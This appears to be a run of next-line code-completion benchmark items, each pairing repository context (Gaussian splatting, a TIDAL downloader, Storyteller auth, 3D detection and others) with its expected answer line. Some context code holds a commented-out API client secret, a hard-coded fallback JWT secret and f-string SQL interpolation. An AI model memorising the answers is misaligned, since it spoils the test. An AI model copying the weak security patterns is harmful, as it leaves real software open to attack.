math.sqrt(n)) scaling = (torch.rand(n, 2) + 0.2) * density_scale rotation = torch.randn(n, 2) rotation = rotation / torch.norm(rotation, dim=1, keepdim=True) low, high = alpha_range alpha = torch.rand(n) * (high - low) + low return Gaussians2D( position=position, depth=depth, log_scaling=torch.log(scaling), rotation=rotation, alpha_logit=torch_proj.inverse_sigmoid(alpha), feature=torch.rand(n, 3), batch_size=(n,) ) # Path: taichi_splatting/torch_ops/util.py def check_finite(tensor_dict): for k, v in tensor_dict.items(): n = (~torch.isfinite(v)).sum() if n > 0: raise ValueError(f'Found {n} non-finite values in {k}') if v.grad is not None: n = (~torch.isfinite(v.grad)).sum() if n > 0: raise ValueError(f'Found {n} non-finite gradients in {k}') # Path: taichi_splatting/scripts/fit_image_gaussians.py import cv2 import argparse import taichi as ti import torch import time from torch.optim import Adam from taichi_splatting.data_types import RasterConfig from taichi_splatting.renderer2d import render_gaussians, Gaussians2D from taichi_splatting.tests.random_data import random_2d_gaussians from taichi_splatting.torch_ops.util import check_finite def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('image_file', type=str) parser.add_argument('--seed', type=int, default=0) parser.add_argument('--tile_size', type=int, default=16) parser.add_argument('--n', type=int, default=20000) parser.add_argument('--debug', action='store_true') parser.add_argument('--show', action='store_true') parser.add_argument('--profile', action='store_true') parser.add_argument('--epoch', type=int, default=100, help='Number of iterations per measurement/profiling') return parser.parse_args() def optimizer(gaussians: Gaussians2D, base_lr=1.0): learning_rates = dict( position=0.1, log_scaling=0.025, rotation=0.005, alpha_logit=0.2, feature=0.01 ) params = {k: torch.nn.Parameter(x, requires_grad=True) if k in learning_rates else x for k, x in gaussians.items()} param_groups = [ dict(params=[params[name]], lr=lr * base_lr, name=name) for name, lr in learning_rates.items() ] return Adam(param_groups), Gaussians2D(**params, batch_size=gaussians.batch_size) def display_image(image): image = (image.detach().clamp(0, 1) * 255).to(torch.uint8) image = image.cpu().numpy() cv2.imshow('rendered', image) cv2.waitKey(1) def main(): device = torch.device('cuda:0') args = parse_args() ref_image = cv2.imread(args.image_file) h, w = ref_image.shape[:2] ti.init(arch=ti.cuda, log_level=ti.INFO, debug=args.debug, device_memory_GB=0.1) print(f'Image size: {w}x{h}') if args.show: cv2.namedWindow('rendered', cv2.WINDOW_FULLSCREEN) torch.manual_seed(args.seed) gaussians = random_2d_gaussians(args.n, (w, h)).to(torch.device('cuda:0')) opt, params = optimizer(gaussians, base_lr=1.0) ref_image = torch.from_numpy(ref_image).to(dtype=torch.float32, device=device) / 255 config = RasterConfig(tile_size=args.tile_size) while True: if args.profile: ti.profiler.clear_kernel_profiler_info() start = time.time() for _ in range(args.epoch): opt.zero_grad()
image = render_gaussians(params, (w, h), config)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: exislow/tidal-dl-ng # Path: tidal_dl_ng/helper/decorator.py class SingletonMeta(type): """ The Singleton class can be implemented in different ways in Python. Some possible methods include: base class, decorator, metaclass. We will use the metaclass because it is best suited for this purpose. """ _instances: ClassVar[dict] = {} def __call__(cls, *args, **kwargs): """ Possible changes to the value of the `__init__` argument do not affect the returned instance. """ if cls not in cls._instances: instance = super().__call__(*args, **kwargs) cls._instances[cls] = instance return cls._instances[cls] # Path: tidal_dl_ng/helper/path.py def path_base() -> str: path_config: str = ".config" path_base: str = os.path.join(path_home(), path_config, __name_display__) return path_base # Path: tidal_dl_ng/helper/path.py def path_file_settings() -> str: # TODO: Remove this soon. Only for migration to new dir. old = os.path.join(path_home(), ".tidal-dl-ng_settings.json") if os.path.isfile(old): os.makedirs(path_base(), exist_ok=True) os.rename(old, os.path.join(path_base(), "settings.json")) return os.path.join(path_base(), "settings.json") # Path: tidal_dl_ng/helper/path.py def path_file_token() -> str: # TODO: Remove this soon. Only for migration to new dir. old = os.path.join(path_home(), ".tidal-dl-ng_token.json") if os.path.isfile(old): os.makedirs(path_base(), exist_ok=True) os.rename(old, os.path.join(path_base(), "token.json")) return os.path.join(path_base(), "token.json") # Path: tidal_dl_ng/model/cfg.py class Settings: skip_existing: SkipExisting = SkipExisting.Disabled # TODO: Implement cover download to a separate file. # album_cover_save: bool = True lyrics_save: bool = False # TODO: Implement API KEY selection. # api_key_index: bool = 0 # TODO: Implement album info download to separate file. # album_info_save: bool = False video_download: bool = True # TODO: Implement multi threading for downloads. # multi_thread: bool = False download_delay: bool = True download_base_path: str = "./download" quality_audio: Quality = Quality.low_320k quality_video: QualityVideo = QualityVideo.P480 format_album: str = "Albums/{artist_name} - {album_title}/{track_num}. {artist_name} - {track_title}" format_playlist: str = "Playlists/{playlist_name}/{artist_name} - {track_title}" format_mix: str = "Mix/{mix_name}/{artist_name} - {track_title}" format_track: str = "Tracks/{artist_name} - {track_title}" format_video: str = "Videos/{artist_name} - {track_title}" video_convert_mp4: bool = True metadata_cover_dimension: CoverDimensions = CoverDimensions.Px320 # Path: tidal_dl_ng/model/cfg.py class Token: token_type: str | None = None access_token: str | None = None refresh_token: str | None = None expiry_time: float = 0.0 # Path: tidal_dl_ng/config.py import os import shutil import tidalapi from collections.abc import Callable from json import JSONDecodeError from typing import Any from requests import HTTPError from tidal_dl_ng.helper.decorator import SingletonMeta from tidal_dl_ng.helper.path import path_base, path_file_settings, path_file_token from tidal_dl_ng.model.cfg import Settings as ModelSettings from tidal_dl_ng.model.cfg import Token as ModelToken class BaseConfig: data: ModelSettings | ModelToken = None file_path: str = None cls_model: object = None path_base: str = path_base() def save(self) -> None: data_json = self.data.to_json() # Try to create the base folder. os.makedirs(self.path_base, exist_ok=True) with open(self.file_path, encoding="utf-8", mode="w") as f: f.write(data_json) def set_option(self, key: str, value: Any) -> None: setattr(self.data, key, value) def read(self, path: str) -> bool: result = False try: with open(path, encoding="utf-8") as f: settings_json = f.read() self.data = self.cls_model.from_json(settings_json) result = True except (JSONDecodeError, TypeError, FileNotFoundError, ValueError) as e: if isinstance(e, ValueError): path_bak = path + ".bak" # First check if a backup file already exists. If yes, remove it. if os.path.exists(path_bak): os.remove(path_bak) # Move the invalid config file to the backup location. shutil.move(path, path_bak) # TODO: Implement better global logger. print( "Something is wrong with your config. Maybe it is not compatible anymore due to a new app version." f" You can find a backup of your old config here: '{path_bak}'. A new default config was created." ) self.data = self.cls_model() # Call save in case of we need to update the saved config, due to changes in code. # TODO: Compare if config in memory and on disk is different. Otherwise no write operation. self.save() return result class Settings(BaseConfig, metaclass=SingletonMeta): cls_model = ModelSettings data = None def __init__(self): self.file_path = path_file_settings() self.read(self.file_path) class Tidal(BaseConfig, metaclass=SingletonMeta): cls_model = ModelToken session: tidalapi.Session = None data: ModelToken = None token_from_storage: bool = False settings: Settings = None def __init__(self, settings: Settings = None): self.session = tidalapi.Session() # self.session.config.client_id = "km8T1xS355y7dd3H" # self.session.config.client_secret = "vcmeGW1OuZ0fWYMCSZ6vNvSLJlT3XEpW0ambgYt5ZuI=" self.session.video_quality = tidalapi.VideoQuality.high
self.file_path = path_file_token()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: smoores-dev/storyteller # Path: storyteller/api/models.py class InviteAccept(BaseModel): username: str full_name: str email: str password: str invite_key: str # Path: storyteller/api/models.py class TokenData(BaseModel): username: str # Path: storyteller/api/database/users.py def get_user(username: str): cursor = connection.execute( """ SELECT username, full_name, email, hashed_password, book_create, book_read, book_process, book_download, book_list, user_create, user_list, user_read, user_delete, settings_update FROM user JOIN user_permission ON user.user_permission_id = user_permission.id WHERE username = :username """, {"username": username}, ) ( username, full_name, email, hashed_password, book_create, book_read, book_process, book_download, book_list, user_create, user_list, user_read, user_delete, settings_update, ) = cursor.fetchone() return DBUser( username=username, full_name=full_name, email=email, permissions=UserPermissions( book_create=book_create, book_read=book_read, book_process=book_process, book_download=book_download, book_list=book_list, user_create=user_create, user_list=user_list, user_read=user_read, user_delete=user_delete, settings_update=settings_update, ), hashed_password=hashed_password, ) # Path: storyteller/api/database/users.py def user_has_permission(username: str, permission: str): cursor = connection.execute( f""" SELECT {permission} FROM user_permission JOIN user ON user.user_permission_id = user_permission.id WHERE user.username = :username """, {"username": username, "permission": permission}, ) (has_permission,) = cursor.fetchone() return has_permission # Path: storyteller/api/database/invites.py def verify_invite(email: str, key: str): cursor = connection.execute( """ SELECT id FROM invite WHERE email=:email AND key=:key """, {"email": email, "key": key}, ) return cursor.fetchone() is None # Path: storyteller/api/auth.py import base64 import json import os from datetime import timedelta, datetime from typing import Annotated, Optional, cast from urllib.parse import unquote from jose import JWTError, jwt from fastapi import Body, Depends, HTTPException, Request, status from fastapi.security import OAuth2PasswordBearer from passlib.context import CryptContext from starlette.status import HTTP_401_UNAUTHORIZED from .models import InviteAccept, TokenData from .database import get_user, user_has_permission, verify_invite as verify_invite_db SECRET_KEY = os.getenv("STORYTELLER_SECRET_KEY", "<notsosecret>") ALGORITHM = "HS256" ACCESS_TOKEN_EXPIRE_DAYS = 10 class OAuth2PasswordBearerWithCookie(OAuth2PasswordBearer): async def __call__(self, request: Request) -> Optional[str]: header_param = None try: header_param = await super().__call__(request) except HTTPException: pass if header_param is not None: return header_param auth_cookie = request.cookies.get("st_token") if not auth_cookie: if self.auto_error: raise HTTPException( status_code=HTTP_401_UNAUTHORIZED, detail="Not authenticated", headers={"WWW-Authenticate": "Bearer"}, ) else: return None auth_token = json.loads(base64.urlsafe_b64decode(unquote(auth_cookie))) access_token = auth_token["access_token"] if not access_token: if self.auto_error: raise HTTPException( status_code=HTTP_401_UNAUTHORIZED, detail="Not authenticated", headers={"WWW-Authenticate": "Bearer"}, ) else: return None return access_token oauth2_scheme = OAuth2PasswordBearerWithCookie(tokenUrl="token") password_context = CryptContext(schemes=["argon2"], deprecated="auto") def verify_password(plain_password: str, hashed_password: str): return password_context.verify(plain_password, hashed_password) def get_password_hash(password: str): return password_context.hash(password) def authenticate_user(username: str, password: str): try: user = get_user(username) except: return None if not verify_password(password, user.hashed_password): return None return user def create_access_token(data: dict, expires_delta: timedelta | None = None): to_encode = data.copy() if expires_delta: expire = datetime.utcnow() + expires_delta else: expire = datetime.utcnow() + timedelta(days=ACCESS_TOKEN_EXPIRE_DAYS) to_encode.update({"exp": expire}) encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM) return encoded_jwt unauthorized = HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail="Invalid authentication credentials", headers={"WWW-Authenticate": "Bearer"}, ) def verify_token(token: Annotated[str, Depends(oauth2_scheme)]): try: payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) username: str | None = cast(str | None, payload.get("sub")) if username is None: raise unauthorized token_data = TokenData(username=username) except JWTError: raise unauthorized return token_data def verify_invite(invite: Annotated[InviteAccept, Body()]):
if verify_invite_db(invite.email, invite.invite_key):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: noprobelm/terminal-cellular-automaton # Path: terminal_cellular_automaton/cell.py class MooreCell: """A cell that references members of a MooreNeighborhood +---+---+---+ | 1 | 2 | 3 | +---+---+---+ | 4 | C | 5 | +---+---+---+ | 6 | 7 | 8 | +---+---+---+ """ neighbors: Tuple[Coordinate, ...] = ( # Upper left Coordinate(-1, -1), # Upper Coordinate(0, -1), # Upper right Coordinate(1, -1), # Right Coordinate(1, 0), # Lower right Coordinate(1, 1), # Lower Coordinate(0, 1), # Lower left Coordinate(-1, 1), # Left Coordinate(-1, 0), ) def __init__(self, coord: Coordinate) -> None: """Initializes an instance of the MooreCell class""" self.coord = coord def get_neighbors(self, max_coord: Coordinate) -> list[Coordinate]: """Gets neighbors based on the max coord. Neighbors will usually be the eight surrounding cells in an automaton, but for cells living along the min/max coords, neighbors will wrap around to the other side of this grid. This ensures continuity and enables a life to wrap around the other side of the simulation once it reaches a boundary, emulating a pseudo-infinite space. Args: max_coord (Coordinate): The maximum coordinate found in the underlying Automaton Returns: A list of the cell's neighbors """ neighbors = [] for nc in self.neighbors: n = nc + self.coord if n.x < 0 and n.y < 0: n = Coordinate(max_coord.x, max_coord.y) elif n.x > max_coord.x and n.y > max_coord.y: n = Coordinate(0, 0) elif n.x < 0 and n.y > max_coord.y: n = Coordinate(max_coord.x, 0) elif n.y < 0 and n.x > max_coord.x: n = Coordinate(0, max_coord.y) elif n.x > max_coord.x: n = Coordinate(0, n.y) elif n.y < 0: n = Coordinate(n.x, max_coord.y) elif n.y > max_coord.y: n = Coordinate(n.x, 0) elif n.x < 0: n = Coordinate(max_coord.x, n.y) elif n.x > max_coord.x: n = Coordinate(0, n.y) neighbors.append(n) return neighbors # Path: terminal_cellular_automaton/coordinate.py class Coordinate: """An x/y coordinate to reference location in a 2 dimensional matrix""" x: int y: int def __add__(self, other: Coordinate) -> Coordinate: """Returns the sum of one coordinate and another. Primarily used to identify neighbors""" return Coordinate(self.x + other.x, self.y + other.y) def __sub__(self, other: Coordinate) -> Coordinate: """Returns the sum of one coordinate and another. Primarily used to identify neighbors""" return Coordinate(self.x - other.x, self.y - other.y) def __contains__(self, other: Coordinate) -> bool: if 0 <= other.x <= self.x and 0 <= other.y <= self.y: return True return False # Path: tests/test_cell.py from ward import test, fixture from terminal_cellular_automaton.cell import MooreCell from terminal_cellular_automaton.coordinate import Coordinate """Tests the get_neighbors method for all Cell types""" @fixture def max_coord(): return Coordinate(2, 2) @test("A centrally located MooreCell will have 8 neighbors in its immediate area") def _():
c = MooreCell(Coordinate(1, 1))
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: zyrant/SPGroup3D # Path: mmdet3d/core/bbox/structures/utils.py @array_converter(apply_to=('points', 'angles')) def rotation_3d_in_axis(points, angles, axis=0, return_mat=False, clockwise=False): """Rotate points by angles according to axis. Args: points (np.ndarray | torch.Tensor | list | tuple ): Points of shape (N, M, 3). angles (np.ndarray | torch.Tensor | list | tuple | float): Vector of angles in shape (N,) axis (int, optional): The axis to be rotated. Defaults to 0. return_mat: Whether or not return the rotation matrix (transposed). Defaults to False. clockwise: Whether the rotation is clockwise. Defaults to False. Raises: ValueError: when the axis is not in range [0, 1, 2], it will raise value error. Returns: (torch.Tensor | np.ndarray): Rotated points in shape (N, M, 3). """ batch_free = len(points.shape) == 2 if batch_free: points = points[None] if isinstance(angles, float) or len(angles.shape) == 0: angles = torch.full(points.shape[:1], angles) assert len(points.shape) == 3 and len(angles.shape) == 1 \ and points.shape[0] == angles.shape[0], f'Incorrect shape of points ' \ f'angles: {points.shape}, {angles.shape}' assert points.shape[-1] in [2, 3], \ f'Points size should be 2 or 3 instead of {points.shape[-1]}' rot_sin = torch.sin(angles) rot_cos = torch.cos(angles) ones = torch.ones_like(rot_cos) zeros = torch.zeros_like(rot_cos) if points.shape[-1] == 3: if axis == 1 or axis == -2: rot_mat_T = torch.stack([ torch.stack([rot_cos, zeros, -rot_sin]), torch.stack([zeros, ones, zeros]), torch.stack([rot_sin, zeros, rot_cos]) ]) elif axis == 2 or axis == -1: rot_mat_T = torch.stack([ torch.stack([rot_cos, rot_sin, zeros]), torch.stack([-rot_sin, rot_cos, zeros]), torch.stack([zeros, zeros, ones]) ]) elif axis == 0 or axis == -3: rot_mat_T = torch.stack([ torch.stack([ones, zeros, zeros]), torch.stack([zeros, rot_cos, rot_sin]), torch.stack([zeros, -rot_sin, rot_cos]) ]) else: raise ValueError(f'axis should in range ' f'[-3, -2, -1, 0, 1, 2], got {axis}') else: rot_mat_T = torch.stack([ torch.stack([rot_cos, rot_sin]), torch.stack([-rot_sin, rot_cos]) ]) if clockwise: rot_mat_T = rot_mat_T.transpose(0, 1) if points.shape[0] == 0: points_new = points else: points_new = torch.einsum('aij,jka->aik', points, rot_mat_T) if batch_free: points_new = points_new.squeeze(0) if return_mat: rot_mat_T = torch.einsum('jka->ajk', rot_mat_T) if batch_free: rot_mat_T = rot_mat_T.squeeze(0) return points_new, rot_mat_T else: return points_new # Path: mmdet3d/models/builder.py HEADS = MODELS # Path: mmdet3d/models/builder.py def build_loss(cfg): """Build loss function.""" if cfg['type'] in LOSSES._module_dict.keys(): return LOSSES.build(cfg) elif cfg['type'] in MMDET_LOSSES._module_dict.keys(): return MMDET_LOSSES.build(cfg) else: return MMSEG_LOSSES.build(cfg) # Path: mmdet3d/models/dense_heads/fcaf3d_head.py import MinkowskiEngine as ME import warnings import torch from mmcv.cnn import Scale, bias_init_with_prob from mmcv.ops import nms3d, nms3d_normal from mmcv.runner.base_module import BaseModule from torch import nn from mmdet3d.core.bbox.structures import rotation_3d_in_axis from mmdet3d.models import HEADS, build_loss from mmdet.core import reduce_mean # Copyright (c) OpenMMLab. All rights reserved. # Adapted from https://github.com/SamsungLabs/fcaf3d/blob/master/mmdet3d/models/dense_heads/fcaf3d_neck_with_head.py # noqa try: except ImportError: warnings.warn( 'Please follow `getting_started.md` to install MinkowskiEngine.`')
@HEADS.register_module()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: jdejaegh/irm-kmi-ha # Path: custom_components/irm_kmi/api.py class IrmKmiApiClient: """API client for IRM KMI weather data""" COORD_DECIMALS = 6 def __init__(self, session: aiohttp.ClientSession) -> None: self._session = session self._base_url = "https://app.meteo.be/services/appv4/" async def get_forecasts_coord(self, coord: dict) -> dict: """Get forecasts for given city.""" assert 'lat' in coord assert 'long' in coord coord['lat'] = round(coord['lat'], self.COORD_DECIMALS) coord['long'] = round(coord['long'], self.COORD_DECIMALS) response = await self._api_wrapper(params={"s": "getForecasts", "k": _api_key("getForecasts")} | coord) return await response.json() async def get_image(self, url, params: dict | None = None) -> bytes: """Get the image at the specified url with the parameters""" r: ClientResponse = await self._api_wrapper(base_url=url, params={} if params is None else params) return await r.read() async def _api_wrapper( self, params: dict, base_url: str | None = None, path: str = "", method: str = "get", data: dict | None = None, headers: dict | None = None, ) -> any: """Get information from the API.""" try: async with async_timeout.timeout(10): response = await self._session.request( method=method, url=f"{self._base_url if base_url is None else base_url}{path}", headers=headers, json=data, params=params ) response.raise_for_status() return response except asyncio.TimeoutError as exception: raise IrmKmiApiCommunicationError("Timeout error fetching information") from exception except (aiohttp.ClientError, socket.gaierror) as exception: raise IrmKmiApiCommunicationError("Error fetching information") from exception except Exception as exception: # pylint: disable=broad-except raise IrmKmiApiError(f"Something really wrong happened! {exception}") from exception # Path: custom_components/irm_kmi/const.py CONF_DARK_MODE: Final = "dark_mode" # Path: custom_components/irm_kmi/const.py CONF_STYLE: Final = "style" # Path: custom_components/irm_kmi/const.py CONF_STYLE_OPTIONS: Final = [ OPTION_STYLE_STD, OPTION_STYLE_CONTRAST, OPTION_STYLE_YELLOW_RED, OPTION_STYLE_SATELLITE ] # Path: custom_components/irm_kmi/const.py CONF_USE_DEPRECATED_FORECAST: Final = 'use_deprecated_forecast_attribute' # Path: custom_components/irm_kmi/const.py CONF_USE_DEPRECATED_FORECAST_OPTIONS: Final = [ OPTION_DEPRECATED_FORECAST_NOT_USED, OPTION_DEPRECATED_FORECAST_DAILY, OPTION_DEPRECATED_FORECAST_HOURLY ] # Path: custom_components/irm_kmi/const.py CONFIG_FLOW_VERSION = 3 # Path: custom_components/irm_kmi/const.py DOMAIN: Final = 'irm_kmi' # Path: custom_components/irm_kmi/const.py OPTION_DEPRECATED_FORECAST_NOT_USED: Final = 'do_not_use_deprecated_forecast' # Path: custom_components/irm_kmi/const.py OPTION_STYLE_STD: Final = 'standard_style' # Path: custom_components/irm_kmi/const.py OUT_OF_BENELUX: Final = ["außerhalb der Benelux (Brussels)", "Hors de Belgique (Bxl)", "Outside the Benelux (Brussels)", "Buiten de Benelux (Brussel)"] # Path: custom_components/irm_kmi/utils.py def get_config_value(config_entry: ConfigEntry, key: str) -> Any: if config_entry.options and key in config_entry.options: return config_entry.options[key] return config_entry.data[key] # Path: custom_components/irm_kmi/config_flow.py import logging import async_timeout import voluptuous as vol from homeassistant.components.zone import DOMAIN as ZONE_DOMAIN from homeassistant.config_entries import ConfigEntry, ConfigFlow, OptionsFlow from homeassistant.const import ATTR_LATITUDE, ATTR_LONGITUDE, CONF_ZONE from homeassistant.core import callback from homeassistant.data_entry_flow import FlowResult from homeassistant.helpers.aiohttp_client import async_get_clientsession from homeassistant.helpers.selector import (EntitySelector, EntitySelectorConfig, SelectSelector, SelectSelectorConfig, SelectSelectorMode) from .api import IrmKmiApiClient from .const import (CONF_DARK_MODE, CONF_STYLE, CONF_STYLE_OPTIONS, CONF_USE_DEPRECATED_FORECAST, CONF_USE_DEPRECATED_FORECAST_OPTIONS, CONFIG_FLOW_VERSION, DOMAIN, OPTION_DEPRECATED_FORECAST_NOT_USED, OPTION_STYLE_STD, OUT_OF_BENELUX) from .utils import get_config_value """Config flow to set up IRM KMI integration via the UI.""" _LOGGER = logging.getLogger(__name__) class IrmKmiConfigFlow(ConfigFlow, domain=DOMAIN): VERSION = CONFIG_FLOW_VERSION @staticmethod @callback def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow: """Create the options flow.""" return IrmKmiOptionFlow(config_entry) async def async_step_user(self, user_input: dict | None = None) -> FlowResult: """Define the user step of the configuration flow.""" errors = {} if user_input: _LOGGER.debug(f"Provided config user is: {user_input}") if (zone := self.hass.states.get(user_input[CONF_ZONE])) is None: errors[CONF_ZONE] = 'zone_not_exist' # Check if zone is in Benelux if not errors: api_data = {} try: async with async_timeout.timeout(10): api_data = await IrmKmiApiClient( session=async_get_clientsession(self.hass)).get_forecasts_coord( {'lat': zone.attributes[ATTR_LATITUDE], 'long': zone.attributes[ATTR_LONGITUDE]} ) except Exception: errors['base'] = "api_error" if api_data.get('cityName', None) in OUT_OF_BENELUX: errors[CONF_ZONE] = 'out_of_benelux' if not errors: await self.async_set_unique_id(user_input[CONF_ZONE]) self._abort_if_unique_id_configured() state = self.hass.states.get(user_input[CONF_ZONE]) return self.async_create_entry( title=state.name if state else "IRM KMI", data={CONF_ZONE: user_input[CONF_ZONE],
CONF_STYLE: user_input[CONF_STYLE],
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: v3ucn/Bert-vits2-V2.2 # Path: config.py class Resample_config: class Preprocess_text_config: class Bert_gen_config: class Emo_gen_config: class Train_ms_config: class Webui_config: class Server_config: class Translate_config: class Config: def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, transcription_path: str, cleaned_path: str, train_path: str, val_path: str, config_path: str, val_per_lang: int = 5, max_val_total: int = 10000, clean: bool = True, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", use_multi_device: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", use_multi_device: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, env: Dict[str, any], base: Dict[str, any], model: str, num_workers: int, spec_cache: bool, keep_ckpts: int, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, device: str, model: str, config_path: str, language_identification_library: str, port: int = 7860, share: bool = False, debug: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, models: List[Dict[str, any]], port: int = 5000, device: str = "cuda" ): def from_dict(cls, data: Dict[str, any]): def __init__(self, app_key: str, secret_key: str): def from_dict(cls, data: Dict[str, any]): def __init__(self, config_path: str): # Path: oldVersion/V210/text/japanese.py def text2sep_kata(text: str) -> (list, list): parsed = pyopenjtalk.run_frontend(text) res = [] sep = [] for parts in parsed: word, yomi = replace_punctuation(parts["string"]), parts["pron"].replace( "’", "" ) if yomi: if re.match(_MARKS, yomi): if len(word) > 1: word = [replace_punctuation(i) for i in list(word)] yomi = word res += yomi sep += word continue elif word not in rep_map.keys() and word not in rep_map.values(): word = "," yomi = word res.append(yomi) else: if word in _SYMBOL_TOKENS: res.append(word) elif word in ("っ", "ッ"): res.append("ッ") elif word in _NO_YOMI_TOKENS: pass else: res.append(word) sep.append(word) return sep, [hira2kata(i) for i in res], get_accent(parsed) # Path: oldVersion/V210/text/japanese_bert.py import sys import torch from transformers import AutoModelForMaskedLM, AutoTokenizer from config import config from .japanese import text2sep_kata LOCAL_PATH = "./bert/deberta-v2-large-japanese-char-wwm" tokenizer = AutoTokenizer.from_pretrained(LOCAL_PATH) models = dict()
def get_bert_feature(text, word2ph, device=config.bert_gen_config.device):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: NOrangeeroli/SecondPose # Path: model/pcd_cross/modules/layers/factory.py def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module: r"""Factory function for dropout layer.""" if p is None or p == 0: return nn.Identity() else: return nn.Dropout(p=p, **kwargs) # Path: model/pcd_cross/modules/transformer/output_layer.py class AttentionOutput(nn.Module): def __init__(self, d_model, dropout=None, activation_fn='ReLU'): super(AttentionOutput, self).__init__() self.expand = nn.Linear(d_model, d_model * 2) self.activation = build_act_layer(activation_fn) self.squeeze = nn.Linear(d_model * 2, d_model) self.dropout = build_dropout_layer(dropout) self.norm = nn.LayerNorm(d_model) def forward(self, input_states): hidden_states = self.expand(input_states) hidden_states = self.activation(hidden_states) hidden_states = self.squeeze(hidden_states) hidden_states = self.dropout(hidden_states) output_states = self.norm(input_states + hidden_states) return output_states # Path: model/pcd_cross/modules/transformer/pe_transformer.py import torch import torch.nn as nn import torch.nn.functional as F from einops import rearrange from ..layers import build_dropout_layer from .output_layer import AttentionOutput r"""Vanilla Transformer without positional embeddings. The shape of input tensor should be (B, N, C). Implemented with `nn.Linear` and `nn.LayerNorm` (with affine). """ class PEMultiHeadAttention(nn.Module): def __init__(self, d_model, num_heads, dropout=None): super(PEMultiHeadAttention, self).__init__() if d_model % num_heads != 0: raise ValueError('`d_model` ({}) must be a multiple of `num_head` ({}).'.format(d_model, num_heads)) self.d_model = d_model self.num_heads = num_heads self.d_model_per_head = d_model // num_heads self.proj_q = nn.Linear(self.d_model, self.d_model) self.proj_k = nn.Linear(self.d_model, self.d_model) self.proj_v = nn.Linear(self.d_model, self.d_model) self.proj_p = nn.Linear(self.d_model, self.d_model) self.dropout = build_dropout_layer(dropout) def forward( self, input_q, input_k, input_v, embed_q, embed_k, key_masks=None, attention_factors=None, ): """Self-attention with positional embedding forward propagation. Args: input_q: torch.Tensor (B, N, C) input_k: torch.Tensor (B, M, C) input_v: torch.Tensor (B, M, C) embed_q: torch.Tensor (B, N, C) embed_k: torch.Tensor (B, M, C) key_masks: torch.Tensor (B, M), True if ignored, False if preserved attention_factors: torch.Tensor (B, N, M) Returns: hidden_states: torch.Tensor (B, C, N) attention_scores: torch.Tensor (B, H, N, M) """ q = rearrange(self.proj_q(input_q) + self.proj_p(embed_q), 'b n (h c) -> b h n c', h=self.num_heads) k = rearrange(self.proj_k(input_k) + self.proj_p(embed_k), 'b m (h c) -> b h m c', h=self.num_heads) v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads) attention_scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / self.d_model_per_head ** 0.5 if attention_factors is not None: attention_scores = attention_factors.unsqueeze(1) * attention_scores if key_masks is not None: attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf')) attention_scores = F.softmax(attention_scores, dim=-1) attention_scores = self.dropout(attention_scores) hidden_states = torch.matmul(attention_scores, v) hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)') return hidden_states, attention_scores class PEAttentionLayer(nn.Module): def __init__(self, d_model, num_heads, dropout=None): super(PEAttentionLayer, self).__init__() self.attention = PEMultiHeadAttention(d_model, num_heads, dropout=dropout) self.linear = nn.Linear(d_model, d_model) self.dropout = build_dropout_layer(dropout) self.norm = nn.LayerNorm(d_model) def forward( self, input_states, memory_states, input_embeddings, memory_embeddings, memory_masks=None, attention_factors=None, ): hidden_states, attention_scores = self.attention( input_states, memory_states, memory_states, input_embeddings, memory_embeddings, key_masks=memory_masks, attention_factors=attention_factors, ) hidden_states = self.linear(hidden_states) hidden_states = self.dropout(hidden_states) output_states = self.norm(hidden_states + input_states) return output_states, attention_scores class PETransformerLayer(nn.Module): def __init__(self, d_model, num_heads, dropout=None, activation_fn='ReLU'): super(PETransformerLayer, self).__init__() self.attention = PEAttentionLayer(d_model, num_heads, dropout=dropout)
self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn)
